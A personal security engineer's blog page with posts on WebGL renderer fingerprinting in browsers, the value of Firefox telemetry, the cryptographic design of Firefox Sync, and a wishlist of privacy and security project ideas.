ritter.vg

webgl renderer privacy

1 Jun 2026 12:36 EST

WebGL exposes the details of your graphics hardware (specifically, the string that describes the rendering engine) in 2 ways. There are three levels of protection that browsers have taken to protect this data.

gl.getParameter(gl.VENDOR) and gl.getParameter(gl.RENDERER) - these are the 'simple' names. At some point in the past, someone argued that it wasn't enough information, and therefore we have a second API
let ext = gl.getExtension('WEBGL_debug_renderer_info'); and then gl.getParameter(ext.UNMASKED_VENDOR_WEBGL) and gl.getParameter(ext.UNMASKED_RENDERER_WEBGL)

The unmasked values are intended to be the more detailed ones, so always make sure you're comparing apples to apples. Another axis is that WebGL can render with Hardware or Software. This isn't a guarentee which one you'll get, but you can hint towards one or the other and the browser may or may not respect it. Here are your values:

Alright, now let's talk about what browsers do about it. There's no point in talking about Vendor, Renderer, and Unmasked Vendor - they don't really show as much detailed info, it's all about Unmasked Renderer. There are three levels:

Give a constant value. (Or don't return anything at all.)
'Round' the values into buckets
Give the exact value back

Safari and Tor Browser give constant values.

Firefox 'rounds'.

Chrome (and Brave, and I assume all-ish other Chrome-based browsers) give the exact value.

Firefox actually is purusing constant values, this week. I wrote this document for our QA team to test it. (You can get a sense of the internal sausage making it takes to launch a privacy feature from it.) I don't know if you can see the dates but I made it May 20th. The problem is this - websites use this data legitimately to adjust behavior so that users get the best experience possible. I found one example where they detect a buggy graphics stack; and a couple of examples where they adjust rendering so things are more performant for users with lower end machines - a problem Apple has less to worry about because they only support certain machine models!

A common response to this seems to be ambivalence, and I would suggest that is a bit elitist. Yes, if you're caring about the details reveal by a particular Web API you probably have a computer where you don't need to worry, but making the web work well for everyone is important for equitable access to improving everyone's human condition.

We have been bucketing WebGL Renderer since 2021. While many of our (supported, on-by-default) fingerprinting protections are part of Enhanced Tracking Protection - rolling out first in PBM/ETP Strict before making it to ETP Standard/Normal Browsing Mode - the bucketing is on by default, for everyone, and is not disabled if ETP is disabled.

How much of a difference does it make? A lot! Here is the distribution of the raw values. 83,705 distinct values.

Compare that to the bucketed data. 131 distinct values.

Now this data is from Firefox, so I cant say conclusively what the distribution of data is in other browsers, but... yeah. To claim Chrome (of all browsers!) is doing this better than us is pure FUD. We're making a big impact in how fingerprintable you are today and we're trying to improve it even further.

telemetry helps. you still get to turn it off

5 Mar 2026 10:12 EST

Phew, it's been a minute since I last wrote anything, hasn't it. And this blog design is pretty dated...

Let me start with this: it is your right to disable telemetry. I fully support that right, and in many cases I disable telemetry myself. If your threat model says "nope", or you simply don't like it, flip the switch. Your relationship with the software and the author of it is a great guide for whether you want to enable telemetry.

What I don't buy is the claim I keep seeing that telemetry is useless and doesn't actually help. I can only speak to Firefox telemetry, but I presume the lesson generalizes. Telemetry has paid for itself many times over on the technical side - stability, security, performance, and rollout safety. If you trust the publisher and want to help them improve the thing you use every day, turning on telemetry is the lowest-effort way to do it. If you don't trust them, or just don't want to... cool.

But be forewarned - if you're one of a very few people doing a very weird thing, we won't even know we need to support that thing. (More on that later.)

What I mean (and don't mean) by "telemetry"

Telemetry is a catch-all for measurements and signals a program sends home. In browsers that includes "technical and interaction data" (performance, feature usage, hardware basics), plus things like crash reports that are often controlled by a separate checkbox. To me, telemetry is things you send to the publisher and you don't directly receive anything in return.

In contrast, there are lots of other phone-home things I wouldn't call telemetry. Software update pings, for example. The publisher can derive data about this - in fact it's one of the only things Tor Browser 'collects' - but the purpose isn't to tell the publisher something, it's to get you the latest version and that's a direct benefit you gain. Firefox obviously has update pings, but it also has something called Remote Settings which is a tool to sync data to your browser for lots of other useful things. You phone home to get this data. Here's the list of collections, and here's a random one (it's overrides for the password autofill to fix certain websites). Overall it's stuff like graphics driver blocklists, addon blocklists, certificate blocklists, data for CRLite, exemptions to tracking protection to unbreak sites, and so on.

And then finally there are things that seem like gratuitous phoning home that I also don't consider telemetry. I don't know the status of all these features and if they still exist, or under what circumstances they happen, but these are things like pinging a known-good website to determine if you're under a captive portal, or roughtime to figure out if all your cert validation is going to break.

Now even for Telemetry - I'm not going to talk about product decisions like "is anyone clicking this button?" Those exist, sure, but they're not my world most days. I don't have any personal success stories from that world - I deal with technical telemetry - the kind that finds crashes and hangs, proves that risky security changes won't brick Nightly, and helps us pick the fastest safe implementation.

And I'm also not going to argue that you should trust Firefox's telemetry. I think you should make an informed decision - but if you're informed about what we collect (and all the mish-mash of data review approvals); how we collect it including 'regular telemetry' (discards your IP immediately), OHTTP (we never see your IP), Prio (privacy preserving calculations); and how we store it (automatic deletion of old data, segmented and unlinked datasets, etc) - and you still think we aren't doing enough to preserve your privacy... Well I can't argue with that. We aren't the absolute best in the world; we're far from the worst. And if we don't meet your threshold, turn it off.

But my point is: it's not pointless. It's not useless. It helps. It's shipped features you rely on.

As a super simple example you can easily poke at yourself - Mozilla's Background Hang Reporter (BHR) exists specifically to collect stacks during hangs on pre-release channels so engineers can find and fix the slow paths. That's telemetry.

Concrete wins from Firefox Telemetry (just from me)

This is a tiny slice from one developer. There are hundreds more across the project.

Killing eval in the parent process (1473549)

Eval is bad, right? It can lead to XSS attacks, and when your browser process is (partially) written with JavaScript - that can be a sandbox escape. We tried to eliminate eval in the parent (UI) process, shipped it to Nightly, and immediately broke Nightly. The entire test suite was green and Mozillians had dogfooded the feature for weeks... and it still blew up on real users with real customizations. We had to revert fast and spin a new build. It was a pretty big incident, and not a good day. So we re-did our entire approach here and put in several rounds of extensive telemetry.

That told us where eval was still happening in the wild, including Mozilla code paths we didn't have tests for and, crucially, a thriving community of Firefox tinkerers using userChromeJS and friends. Because telemetry surfaced those scripts, I could go talk to that community, explain the upcoming change, and work around the breakages. See the public thread on the firefox-scripts repo for a flavor of that conversation. There's no way we could have safely shipped this without telemetry, and certainly no way we could have preserved your ability to hack Firefox to do what you want.

Background Hang Reporter saved me from myself (1721840)

BHR data showed specific interactions where my code hung - no apparent reason, never would have guessed. I refactored, and the hang graphs dropped. That feedback loop doesn't exist without telemetry being on in pre-release.

Fission (site isolation) and data minimization (1708798)

Chrome has focused a lot on removing cross origin data from content processes, as well as the IPC security boundary for cross origin data retrieval. Coming from Tor Browser (where I am also a developer, although not too active) - I was also pretty concerned with personal user data unrelated to origin data. Stuff like your printer or device name. As part of Fission, I worked to eliminate both cross-origin data and personally identifiable things from the content process so a web process running a Spectre attack couldn't get those details. Telemetry helped us confirm we weren't breaking user workflows as we pulled those identifiers out.

Ending internet-facing jar: usage

Years ago Firefox allowed jar: URIs from web content, and the security model was... not great. Telemetry let us show that real-web usage was basically nonexistent, which made closing that attack surface from the web a no-brainer.

Same story brewing for XSLT

Chrome has been pushing to deprecate/remove XSLT in the browser due to security/maintenance risk and very low usage; I'm supportive. Usage telemetry is the only way we're able to justify removing a feature from the web.

Picking the fastest safe canvas noise (1972586)

For anti-fingerprinting canvas noise generation, I used telemetry to measure which implementation was actually fastest across CPUs: it's SHA-256 if you have SHA extensions; SipHash if you don't - or if the input is under ~2.5KB. That choice matters when you multiply it by billions of calls.

Font allowlist for anti-fingerprinting (Lists, 1795460)

Fonts are a huge fingerprinting vector. We built a font allowlist and font-visibility controls; by design, Firefox's fingerprinting protection avoids using your locally installed one-off fonts on the web. This dramatically shrinks the entropy of "which fonts do you have?" without breaking normal sites. While many browsers do this now, telemetry has helped us continue to improve these defenses and I'm pretty sure we're still the only one that has a font allowlist for Android.

Reality check on Resist Fingerprinting users

Folks who manually enable our "Resist Fingerprinting" preference (which we don't officially support, and I don't generally recommend - but hey, you do you) are very loud on Bugzilla. VERY loud. To the point where I've had a lot of managers and executives come telling me "Everyone is complaining about this breaking stuff, we really need to disable this so people can't accidentally turn it on." Telemetry let me show that despite being SO LOUD they're still a minute portion of the population. Management's question "Should we block it?" became "No." You're welcome.

That's just my lane. People I work closely with used telemetry to:

Ship CRLite (privacy-preserving certificate revocation that's finally practical). Telemetry was instrumental in making this happen.
Roll out TLS features like Certificate Transparency support and HTTPS-First behavior, watching real-world fallout and compatibility.
Tighten OS sandboxes. I've been working at Mozilla close to 10 years, and I vividly remember the days we lagged behind Chrome in how tight we had our sandbox. (We're on par now, if you didn't realize.) The only way we could do this was by continually running experiments and monitoring telemetry and crash reports as we identified more and more things we broke and needed to fix before we could ship it.
Gabriele Svelto works in the stability and crash reporting team and has written extensively about the unexpected things he finds and diagnoses using crash reports.

I could give more examples, but I think you get the idea.

"I use Foo browser because it disables telemetry."

Every major browser either implements telemetry or outsources the job to the upstream engine, and benefits from their having it. Period. Even Brave does telemetry, and they're quite public about their design (P3A): collected into buckets/histograms with privacy techniques like shuffling/thresholding. That's a perfectly respectable approach.

We can debate the efficacy or privacy properties of different telemetry designs. We can both stand aghast at overcollection of things that shouldn't be collected. We can debate whether it should be opt-out or opt-in. But only if we both start from the position that telemetry isn't philosophically bad, it can just be implemented badly.

Every Foo browser that brags about disabling telemetry is relying on their upstream source - whether it's Firefox or Chrome - to improve the Foo browser using someone else's telemetry - all while trying to take this moral high ground.

If you want to use Foo because it adds features you like, or you trust its publisher to choose defaults more than upstream - those are completely valid reasons to use it. But if the reason is "Telemetry is just a way for Firefox to spy on me", hopefully I've dented that perception.

What is Firefox Sync and why would you use it

13 Nov 2018 9:00:34 EST

This article originally appeared on the Mozilla Hacks blog.

That shopping rabbit hole you started on your laptop this morning? Pick up where you left off on your phone tonight. That dinner recipe you discovered at lunchtime? Open it on your kitchen tablet, instantly. Connect your personal devices, securely. – Firefox Sync

Firefox Sync lets you share your bookmarks, browsing history, passwords and other browser data between different devices, and send tabs from one device to another. It’s a feature that millions of our users take advantage of to streamline their lives and how they interact with the web.

But on an Internet where sharing your data with a provider is the norm, we think it’s important to highlight the privacy aspects of Firefox Sync.

Firefox Sync by default protects all your synced data so Mozilla can’t read it. We built Sync this way because we put user privacy first. In this post, we take a closer look at some of the technical design choices we made and why.

When building a browser and implementing a sync service, we think it’s important to look at what one might call ‘Total Cost of Ownership’. Not just what users get from a feature, but what they give up in exchange for ease of use.

We believe that by making the right choices to protect your privacy, we’ve also lowered the barrier to trying out Sync. When you sign up and choose a strong passphrase, your data is protected from both attackers and from Mozilla, so you can try out Sync without worry. Give it a shot, it’s right up there in the menu bar!

Why Firefox Sync is safe

Encryption allows one to protect data so that it is entirely unreadable without the key used to encrypt it. The math behind encryption is strong, has been tested for decades, and every government in the world uses it to protect its most valuable secrets.

The hard part of encryption is that key. What key do you encrypt with, where does it come from, where is it stored, and how does it move between places? Lots of cloud providers claim they encrypt your data, and they do. But they also have the key! While the encryption is not meaningless, it is a small measure, and does not protect the data against the most concerning threats.

The encryption key is the essential element. The service provider must never receive it – even temporarily – and must never know it. When you sign into your Firefox Account, you enter a username and passphrase, which are sent to the server. How is it that we can claim to never know your encryption key if that’s all you ever provide us? The difference is in how we handle your passphrase.

A typical login flow for an internet service is to send your username and passphrase up to the server, where they hash it, compare it to a stored hash, and if correct, the server sends you your data. (Hashing refers to the activity of converting passwords into unreadable strings of characters impossible to revert.)

The crux of the difference in how we designed Firefox Accounts, and Firefox Sync (our underlying syncing service), is that you never send us your passphrase. We transform your passphrase on your computer into two different, unrelated values. With one value, you cannot derive the other⁰. We send an authentication token, derived from your passphrase, to the server as the password-equivalent. And the encryption key derived from your passphrase never leaves your computer.

Interested in the technical details? We use 1000 rounds of PBKDF2 to derive your passphrase into the authentication token¹. On the server, we additionally hash this token with scrypt (parameters N=65536, r=8, p=1)² to make sure our database of authentication tokens is even more difficult to crack.

We derive your passphrase into an encryption key using the same 1000 rounds of PBKDF2. It is domain-separated from your authentication token by using HKDF with separate info values. We use this key to unwrap an encryption key (which you generated during setup and which we never see unwrapped), and that encryption key is used to protect your data. We use the key to encrypt your data using AES-256 in CBC mode, protected with an HMAC³.

This cryptographic design is solid – but the constants need to be updated. One thousand rounds of PBKDF can be improved, and we intend to do so in the future (Bug 1320222). This token is only ever sent over a HTTPS connection (with preloaded HPKP pins) and is not stored, so when we initially developed this and needed to support low-power, low-resources devices, a trade-off was made. AES-CBC + HMAC is acceptable – it would be nice to upgrade this to an authenticated mode sometime in the future.

Other approaches

This isn’t the only approach to building a browser sync feature. There are at least three other options:

Option 1: Share your data with the browser maker

In this approach, the browser maker is able to read your data, and use it to provide services to you. For example, when you sync your browser history in Chrome it will automatically go into your Web & App Activity unless you’ve changed the default settings. As Google Chrome Help explains, “Your activity may be used to personalize your experience on other Google products, like Search or ads. For example, you may see a news story recommended in your feed based on your Chrome history.”⁴

Option 2: Use a separate password for sign-in and encryption

We developed Firefox Sync to be as easy to use as possible, so we designed it from the ground up to derive an authentication token and an encryption key – and we never see the passphrase or the encryption key. One cannot safely derive an encryption key from a passphrase if the passphrase is sent to the server.

One could, however, add a second passphrase that is never sent to the server, and encrypt the data using that. Chrome provides this as a non-default option⁵. You can sign in to sync with your Google Account credentials; but you choose a separate passphrase to encrypt your data. It’s imperative you choose a separate passphrase though.

All-in-all, we don’t care for the design that requires a second passphrase. This approach is confusing to users. It’s very easy to choose the same (or similar) passphrase and negate the security of the design. It’s hard to determine which is more confusing: to require a second passphrase or to make it optional! Making it optional means it will be used very rarely. We don’t believe users should have to opt-in to privacy.

Option 3: Manual key synchronization

The key (pun intended) to auditing a cryptographic design is to ask about the key: “Where does it come from? Where does it go?” With the Firefox Sync design, you enter a passphrase of your choosing and it is used to derive an encryption key that never leaves your computer.

Another option for Sync is to remove user choice, and provide a passphrase for you (that never leaves your computer). This passphrase would be secure and unguessable – which is an advantage, but it would be near-impossible to remember – which is a disadvantage.

When you want to add a new device to sync to, you’d need your existing device nearby in order to manually read and type the passphrase into the new device. (You could also scan a QR code if your new device has a camera).

Other Browsers

Overall, Sync works the way it does because we feel it’s the best design choice. Options 1 and 2 don’t provide thorough user privacy protections by default. Option 3 results in lower user adoption and thus reduces the number of people we can help (more on this below).

As noted above, Chrome implements Option 1 by default, which means unless you change the settings before you enable sync, Google will see all of your browsing history and other data, and use it to market services to you. Chrome also implements Option 2 as an opt-in feature.

Opera ~~and Vivaldi~~ follow Chrome’s lead, implementing Option 1 by default and Option 2 as an opt-in feature. Update: Vivaldi actually prompts you for a separate password by default (Option 2), and allows you to opt-out and use your login password (Option 1).

Brave, also a privacy-focused browser, has implemented Option 3. And, in fact, Firefox also implemented a form of Option 3 in its original Sync Protocol, but we changed our design in April 2014 (Firefox 29) in response to user feedback⁶. For example, our original design (and Brave’s current design) makes it much harder to regain access to your data if you lose your device or it gets stolen. Passwords or passphrases make that experience substantially easier for the average user, and significantly increased Sync adoption by users.

Brave’s sync protocol has some interesting wrinkles⁷. One distinct minus is that you can’t change your passphrase, if it were to be stolen by malware. Another interesting wrinkle is that Brave does not keep track of how many or what types of devices you have. This is a nuanced security trade-off: having less information about the user is always desirable… The downside is that Brave can’t allow you to detect when a new device begins receiving your sync data or allow you to deauthorize it. We respect Brave’s decision. In Firefox, however, we have chosen to provide this additional security feature for users (at the cost of knowing more about their devices).

Conclusion

We designed Firefox Sync to protect your data – by default – so Mozilla can’t read it. We built it this way – despite trade-offs that make development and offering features more difficult – because we put user privacy first. At Mozilla, this priority is a core part of our mission to “ensure the Internet is a global public resource… where individuals can shape their own experience and are empowered, safe and independent.”

⁰ It is possible to use one to guess the other, but only if you choose a weak password. ⬑

¹ You can find more details in the full protocol specification or by following the code starting at this point. There are a few details we have omitted to simplify this blog post, including the difference between kA and kB keys, and application-specific subkeys. ⬑

² Server hashing code is located here. ⬑

³ The encryption code can be seen here. ⬑

⁴ https://support.google.com/chrome/answer/165139 Section “Use your Chrome history to personalize Google” ⬑

⁵ Chrome 71 says “For added security, Google Chrome will encrypt your data” and describes these two options as “Encrypt synced passwords with your Google username and password” and “Encrypt synced data with your own sync passphrase”. Despite this wording, only the sync passphrase option protects your data from Google. ⬑

⁶ One of the original engineers of Sync has written two blog posts about the transition to the new sync protocol, and why we did it. If you’re interested in the usability aspects of cryptography, we highly recommend you read them to see what we learned. ⬑

⁷ You can read more about Brave sync on Brave’s Design page. ⬑

My Tech Wishlist

14 Feb 2017 11:20 EST

Over time, I've accumulated a lot of ideas that I would love to work on myself, but have to admit I pretty much never will (there's only so many hours in the day.) At the same time, I regularly see project proposals (as part of the Advisory Councils for OTF and CII) that... while not bad, often don't inspire excitement in me. So I thought I'd write down some of my ideas in the hope that they inspire someone else.

Of note: I don't know about everything on the Internet. It's a certainty that someone really this uses something that I want on the daily. Please, leave a comment and point to implementations!

Ideas

Secure Mobile Encryption with a PIN

Why do you think the FBI had to go to Apple to unlock a suspect's iPhone; but they've never had to go to Google? On a new iPhone (emphasis new, older models don't apply), the '10 incorrect PINs erase the phone' functionality is backed by hardware and very difficult to bypass. On Android... there is such a landscape of phones that even if one of them had hardware backed security for the PIN (and I don't even know if one does!) you'd have to go out of your way to purchase that individual phone.

Now let's switch to the perspective of app developers. You want to build your app so if someone seizes or steals the user's phone, there's protection against brute force attacks trying to obtain a user's data. But with the landscape of Android being what it is, you can't rely on the lockscreen. (And recommending a user go buy a new phone is out of the question.) So as a developer you have to build the feature yourself. So if you encrypt the database, you have to assume the (encrypted) database can be extracted from the phone. There's no safe place to store the key on the phone so the only thing protecting against brute force is the user's PIN or password. And it's not like typing in a 10 word pass-poem is friendly on a phone - especially if it's required every time you open the app!

So as an application developer - you're screwed. There's no way to enable a user to have a good experience with your app and protect their data. But it doesn't have to be this way. An Android phone has a plethora of secure elements on it - hardware devices that are difficult for attackers to bypass. And the most universal one is... the SIM card.

Imagine an Android app that loads a small JavaCard applet onto the SIM Card. Upon app startup, the user creates a 4-digit PIN that is passed to and stored in the JavaCard applet. The JavaCard applet generates a random encryption key and passes it to the Android app, which uses it to encrypt that database that is stored on the phone. Next time you start up the Android app, you enter a PIN - which gets passed to the JavaCard applet. If the PIN matches what's stored in the applet, the applet returns the encryption key and the app uses it to decrypt the database. But after 10 wrong tries the applet erases the key - locking the attacker out of the database forever. The important point here is that the PIN (or encryption key) is difficult to extract from the SIM card because that's why SIM cards exist - to have a small secure element where it's difficult to steal data from.

Just like that, we have enforceable brute force protection for even 4 digit PINs. What to build this? Where do you get started? Well, SEEK for Android is an Android patch that adds a SmartCard API. Nikolay Elenkov wrote a blog post several years ago about doing something very similar to this idea.

Regrettably the end-game for this is somewhat limited. It's impossible to load JavaCard applets onto normal US carrier SIMs (because they're locked down). You can buy pretty nice Dual-SIM Android phones and put a carrier SIM in one slot and a programmable SIM in the other slot. But this doesn't solve the 'Don't require people to buy a new phone' problem. This does seem like the type of thing that Copperhead would be interested in (and Lineageos and potentially other Android OSes).

Privacy Preserving Location Sharing

Location is a pretty personal thing. No one wants to give their location to some third party to store forever and track us. Nor does anyone want to constantly give out their location to a huge list of friends or acquaintances on the off chance one might be 'nearby'. But when you're meeting someone, or traveling to a new city, or going out to the bar with friends, or a host of other scenarios - it would be nice to share your location automatically. An app that shares location, with a lot of privacy settings and geo-fences, sounds like a really useful tool. Could it exist?

It could! A paper was published talking about how to accomplish it in 2007. Since then it's been cited something like 170 times which implies there might have been some improvements. In 2008 this was implemented as NearbyFriend; and in 2012 it was updated (kinda) to use a more free geolocation API. But both projects have sat dormant.

I think that's a shame, and more than a shame - it's an opportunity. This functionality sits well with the end-to-end encrypted messengers we use daily. Some of the features I would want would include controlling location granularity, geo-fences around places I don't ever want to 'be', and 'muting' contacts so that they can't tell I'm purposely not sharing my location with them.

Remote Server Attestation of OSS Server Configs

When it comes to UEFI and Secure Boot and all that jazz, I kind of wave my hands around and butcher what Ted Reed has told me in various bars and airports. So without adieu... /me begins waving his hands.

Secure Boot is this term for saying that when your computer boots up, it does so (or can do so if you chant the right incantations) into a kernel that is signed. The entire boot process moves from a signed BIOS to a signed kernel and signed kernel modules. We want to take this a step further with Remote Attestation. Remote Attestation is a way of saying "This is the hash of all the code I am running currently." That includes the kernel and can include userspace. The hash is signed by a key that is baked into hardware.

Remote Attestation got a bad rap because one of its initial goals was to ensure you weren't bypassing DRM, and because it generally had no provisions for privacy protection (that key, after all, is a baked-in permanent identifier you couldn't change.) But instead of using it on individuals laptops, let's turn it around and use it on servers. It would be great to enable some transparency into what sorts of things are happening on service providers' servers and there's plenty of open source projects who handle user data that I'm sure would like to provide even greater transparency to their operations. So, set up your servers using Docker or Puppet or whatever and publish exactly what you are running on them, and allow the general public to use Remote Attestation to confirm that the server has not been modified from that configuration in any way. (It would also enable the service provider themselves to know if their servers were tampered with!)

This is hardly a weekend project. Secure Boot itself is finicky and that's not even getting into Remote Attestation. And there will be bypasses - both of Secure Boot and the integrity of the system that is being attested. But with each bypass we can (hopefully) improve the system and finally reach the goal of being able to verify, remotely, the integrity and transparency of a running server.

Open Source TPM-Backed, Authenticated Disk Crypto

I was pretty heavily involved in the TrueCrypt audit and I've played with BitLocker too. I'm not a huge fan of either of them. Here's what I want in disk encryption software:

Open Source - like TrueCrypt
Backed by a TPM - like BitLocker
Multiplatform - like TrueCrypt
Supports Full-Disk or Containers/Volumes - like TrueCrypt
Doesn't use XTS mode. At this point I think I would be happy with either Elephant from BitLocker, or an Authenticated Encryption mode like... no one. (I'd be fine with it eating up some of my disk space and performance storing authentication tags and doing a three phase commit (write new tag, write data, overwrite old tag))

The whole 'hidden container' / 'hidden operating system' notion is... really cool. But I've never examined how easy or difficult it is to detect them in a realistic setting. And I am extremely skeptical even knowledgeable users have the discipline needed to maintain the 'cover volume' in a way that appears convincing to the authorities. So this would be neat but far from required.

There are other features that'd be nice for power users or enterprise customers, sure. Additional key slots for enterprise decryption; removable bootloader like luks on Linux. But they're not the standard feature set needed by the average person.

Authenticated WebRTC Video Chats

In the beginning (well not really, but I'm going to play fast and loose with how I refer to 'time' for this section) there was RedPhone and Silent Circle and we had this ZRTP thing and we could do encrypted calls on our phones and it seemed great. And then Skype and Facetime and Google Hangouts and Facebook Chat and the like came along (well they were already there but pretend with me) and they had video calls. And here we were with our (admittedly crappy) encrypted audio.

But it doesn't have to be this way. Why don't we have open source, end-to-end encrypted video chat? WebRTC is built into open source browsers!

If you've never looked at WebRTC I don't blame you. But let you tell you a few things about it. WebRTC usually uses a STUN server to coordinate a peer-to-peer connection, but if the p2p connection fails, a TURN server can be used to pass the (encrypted) media stream back and forth. The media stream is encrypted using DTLS. Now if the other side of your DTLS connection is just a user with a web browser, what certificate are they using and how would you validate it? The answer is: a random certificate and you disable validation. But the important point is that WebRTC exposes the certificate.

So if we had some sort of end-to-end encrypted and authenticated chat, we could use that to bootstrap verification of WebRTC certificates! (...looks around optimistically...) Of course that's only part of the work, you would also need to go and find some open source self-hosted RTC setup to build upon...

Mic and Audio Cutoffs

The first two laptops I owned (that weren't my father's) had a toggle switch on the side to turn the WiFi on and off. I don't know how they worked - if it was a software switch or a power switch. But in a world where even the pope covers his camera with a sticker it's high time laptops came with a hard power switch for the camera and microphone. And I don't mean a software switch (we've seen too many examples of those being bypassed) I mean an honest to god 'If this LED is not lit then the microphone and camera are not getting power' switch.

It would be super-keen to have some kickstarter create usb and audio jack shims that add this feature too, so you can retrofit existing desktop-like setups, but this seems like too much of a niche market since most users could either unplug the accessories or have them built in and unremovable.

It was pointed out to me that Purism makes laptops with this feature!

Encrypted Broadcast Pager Network for SMS

You know what has the potential to be surprisingly private? Pagers. I'm not going to pretend I know anything about Pagers historically or how they're implemented today - but I do know that encrypted broadcast networks can be secure. Imagine one-way pagers, with an encryption key baked into a SIM card, coupled with local or satellite transmitters. You're going to need to compromise on this like Forward Secrecy, but with products like goTenna and beartooth - antiquated technology is getting a new lease on life with applied correctly. I have to wonder if this would be helpful in places with unreliable or unsafe internet.

More Better Faster Compiler Hardening

Exploit Mitigations like Control Flow Integrity are great. What's not great is the performance loss. Don't get me wrong, it's gotten leaps and bounds better over the years but the truth of the matter is - that performance cost still holds back organizations from deploying the hardening features. So anything that can be done to make Control Flow Integrity, Memory Partitioning, Virtual Table Verification, or similar features faster gets my enthusiasm.

Oh and Microsoft, for christ-sakes, it's been five years let the rest of us use vtguard.

Update & Binary Transparency

We're getting some good experience with Certificate Transparency; and we're also starting to flesh out some notions of Gossip (and that it's hard and that maybe it won't work the way we thought, but we're finally starting to talk about it.) It's time to move to the next two items on the list: Update and Binary Transparency.

Let's tackle the easier one first: Update Transparency (or UT). Lots of applications, especially browsers, have small components in them that auto-update. Extensions, Safebrowsing lists, PKI revocation information, and the browser updates themselves. Each of these 'update packages' stands on its own as a discrete chunk of data. Why not require the (hash of the) data to be present in a Transparency Log, with a STH and inclusion proof before the update is accepted by the browser?

One would have to think through how Gossip might work for this. We'll assume that there are independent auditors that come configured with the application (a browser in this case) and/or can be added manually. When a browser receives an 'update package', before it applies it, it will send the STH to the auditors. This could be done a few ways:

Over pinned HTTPS directly to the auditor. This reveals user identity and behavior to the auditor but enables confirmation that the auditor received and processed the STH.
Using DNS. This obscures user identity (to the point of DNS resolver) but does not ensure to the application that the auditor received the data
Over a proxied connection to the auditor, routed through the browser manufacturer. The browser establishes a secure connection to the browser manufacturer, then creates an inner secure connection to one or more auditors. Done correctly, this should obscure user identity, although like the other two it does reveal general usage information. I think this is probably the best option.

Update transparency, while not simple, is simpler than Binary Transparency. When trying to think through Binary Transparency you run into concerns like a package's dependencies, different compilation options, it requires reproducible builds to start with (which in turn requires a very rigid toolchain...) That's not to say it shouldn't be explored also, but I think the next application of append-only Merkle Trees should be Update Transparency.

Encrypted Email Delivery

Email, and email security, is kind of confusing. MUA, MSA, MTA, MDA, SMTP, SMTPS, POP, POPS, IMAP, IMAPS, StartSSL, and that's not even getting into SPF, DMARC, DKIM, DANE or (god forbid) encrypted email (of the PGP or S/MIME variety.) I'm just going to talk about normal email. Like you use.

Hopefully when you check your email (and it's not in a browser), you do so using either POP or IMAP either over TLS or using StartSSL. The certificate that's returned to you is actually valid. That is, if you're checking your gmail, and you try to connect to imap.gmail.com - you get a certificate valid for imap.gmail.com. When you send an email, you do so using SMTP over TLS or using StartSSL and, again, you get a valid certificate. If you don't get a valid certificate or you cannot perform a StartSSL upgrade from plaintext to TLS - the connection fails.

Now let me take an aside right here. This is what happens if you use gmail or email through your company etc etc. It's not what happens if you get your email from Earthlink or from Uncle Bob's Rural Internet Provider, Hanggliding, and BBQ. I know this, for a fact, because for Earthlink Robert Graham told me so and for the the latter I have family who get their Internet from Uncle Bob and TLS is not supported. Which means it's not just their email going over insecure connections, it's their passwords too. But don't worry I'm sure they don't reuse the password. (Heh.)

Okay, let's come back to it. After you send your email, it goes from your Mail User Agent (MUA) to a Mail Submission Agent (MSA) to a Mail Transfer Agent (MTA). (The MSA and MTA are usually combined though.) The MTA transfers the email to an MTA run by the email provider of the recipient (let's imagine someone on yahoo email someone on gmail.) This Yahoo-MTA to Gmail-MTA connection is the weak point in the chain. MTAs rarely have correct TLS certificates for them, but even if they did - it wouldn't help. You see you find the MTA by looking up the MX record from DNS, and DNS is insecure. So even if the MTA required a valid certificate, the attacker could forge an MX record that points to their domain, that they have a valid certificate for.

It gets worse. Some MTAs don't support TLS at all. Combined with the certificate problem, we have a three-step problem. Some MTAs don't support TLS, so no MTA can require TLS unless it refuses to talk to some of the internet. Many MTAs that have TLS don't have valid certificates, so no MTA can require valid certificates unless it refuses to talk to some of the internet. And even if it has a valid certificate, almost no one has deployed DNSSEC so no MTA can require DNSSEC unless it refuses to talk to almost the entire internet. Google publishes some data about this.

BUT! We have solutions to these problems. They're actively being worked on over in the IETF's UTA group. One draft is for pinning TLS support (and it has a complimentary error reporting draft.) To secure the MX records, there's DANE but it requires DNSSEC.

Implementing these drafts and working on these problems makes tangible impact to the security and privacy of millions of people.

Delay Tolerant Networking

DTN is one of those things that exists today, but you don't think about it or realize it. I mean NASA has to talk to Curiosity somehow! The IETF has gotten in on the game too. I'm not really going to lie to you - I don't know what's going on in the DTN space. But I know it has a lot of applications that I'm interested in.

Mix Networks
Mesh Networks, like those used in Taiwanese protects
Spotty connections, such as satellite downlinks and modems. think of how Telecomix got some internet into and out of Egypt during the Arab Spring
Offline networks, where data is transmitted via USB Drives - which is hugely popular in Cuba and, I believe, parts of Africa
Peer-to-peer exchanges, like the one Guardian Project is developing

I'm kind of lumping disconnected peer-to-peer data exchange in with true 'delayed networking' but whatever. They're similar. Understanding how to build applications using what are hopefully safe and interoperable protocols sounds like an important path forward.

Email Labels

Come on world. It's 2017. Labels won, folders lost. Why is gmail the only real system out there using labels? I mean we have hardlinks in the filesystem for crying out loud.

There seems to be a thing called 'notmuch' that a few people I know use, and it might have labels (sorry 'tags')... But where's the webmail support? Thunderbird (RIP...)?

Encrypted Email Databases

You know what was really cool? Lavabit. I don't know about Lavabit today (they have been up to a whole lot of work lately which I should really investigate) but let's talk about Lavabit the day before the government demanded Snowden's emails.

Lavabit was designed so that the user's emails were encrypted with the user's email password. The password itself was sent to the server in plaintext (over TLS), so the server certainly could store the password and have complete access to the user's data - this is not groundbreaking impenetrable security. But you know what? It's completely transparent to the user, and it's better than leaving the emails laying around in plaintext.

Why haven't we made some subtle improvements to this design and deployed it? Why are we letting the perfect be the enemy of the good?

Intel SGX Applications

SGX allows you to take a bundle of code and lock it away inside a container where no one, not even root, can access its data or modify its code. It's both inspiring and terrifying. What amounts to giving every consumer their own HSM for free, and terrifying undebuggable malware. I can think of a lot of things one can do with this, including:

Develop ports of gpg-agent and ssh-agent that move your key material into an SGX container
Develop something similar for TLS keys in apache/nginx
Create a SGX application that tries to detect other SGX applications running on the machine using side-channels such as allocating all memory reserved for SGX
- And if doing so can block other applications from running
Investigate if EGETKEY can be used as a tracking vector. (See this tweet.)
- And creating an application that factory resets and rotates the SGX keys every day

grsecurity

grsecurity is pretty awesome. I would love for it to more integrated (more features upstreamed) and easier to use (an ubuntu distribution for example). I can't claim to be familiar with the attempts that have been made in the past, I can also dream of a future where the enhanced security it provides is easily available to all.

Apparently coldkernel is a project that makes it easier to use grsecurity, although it says it's "extremely alpha".

Encrypted DNS

